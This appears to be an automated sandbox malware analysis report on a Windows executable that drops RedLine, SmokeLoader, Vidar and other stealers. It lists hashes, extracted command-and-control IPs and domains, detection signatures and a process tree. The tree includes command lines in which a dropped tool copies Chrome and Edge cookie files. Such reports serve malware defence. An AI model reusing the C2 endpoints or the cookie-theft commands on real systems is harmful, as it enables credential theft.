Analysis
-
max time kernel
1798s -
max time network
1808s -
platform
windows11_x64 -
resource
win11 -
submitted
17-08-2021 08:50
General
-
Target
375C1FFE19F2FBA6FF5F32B4000CDEA4.exe
-
Size
631KB
-
MD5
375c1ffe19f2fba6ff5f32b4000cdea4
-
SHA1
2557bf9d890e4e0832fb03474657dae9c0037db3
-
SHA256
b9f79bcb4c0ea9e939b35813e807fda308b7038f1dea613e7d8bbd7fe127ac84
-
SHA512
63c504fe78a323e570bc56459f6081e33444e6ebd8b39e64c1b4019c6dd32ad3d9b603f3f0e72d42963f39f5a3e676d1b3a60bd251287266b494faf591206042
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
4
C2
213.166.68.170:16810
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
ls4
C2
ighaisexel.xyz:80
Extracted
Family
redline
Botnet
32222
C2
188.124.36.242:25802
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
evasion 5 IoCs
evasion.
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
-
Vidar Stealer 2 IoCs
-
Blocklisted process makes network request 10 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 23 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 42 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 44 IoCs
-
Modifies registry class 20 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\375C1FFE19F2FBA6FF5F32B4000CDEA4.exe"C:\Users\Admin\AppData\Local\Temp\375C1FFE19F2FBA6FF5F32B4000CDEA4.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\49G7lSDL36pm6Tf9CJu2K920.exe"C:\Users\Admin\Documents\49G7lSDL36pm6Tf9CJu2K920.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"3⤵
-
C:\Users\Admin\Documents\iRqjX4A5YnqgK2YsIoMgdSoD.exe"C:\Users\Admin\Documents\iRqjX4A5YnqgK2YsIoMgdSoD.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe"C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\KpjOE9plqshxTez0Y9Dq5Tb5.exe"C:\Users\Admin\Documents\KpjOE9plqshxTez0Y9Dq5Tb5.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe"C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exeC:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\c_VdWDUCwwtRatLZqa1msoRS.exe"C:\Users\Admin\Documents\c_VdWDUCwwtRatLZqa1msoRS.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe"C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exeC:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\1NpraAWhj4kgz1ajLCCVpFRf.exe"C:\Users\Admin\Documents\1NpraAWhj4kgz1ajLCCVpFRf.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qTlcjPAmCYslnsQO0fRE5dYW.exe"C:\Users\Admin\Documents\qTlcjPAmCYslnsQO0fRE5dYW.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\VjGNJYTkssviPnxpDIwNcfng.exe"C:\Users\Admin\Documents\VjGNJYTkssviPnxpDIwNcfng.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 3003⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\loELqQbmJRQpxMeJ5AAEU5fN.exe"C:\Users\Admin\Documents\loELqQbmJRQpxMeJ5AAEU5fN.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"3⤵
- Drops file in Drivers directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4004 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5872 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6320 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5428 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7116 /prefetch:85⤵
-
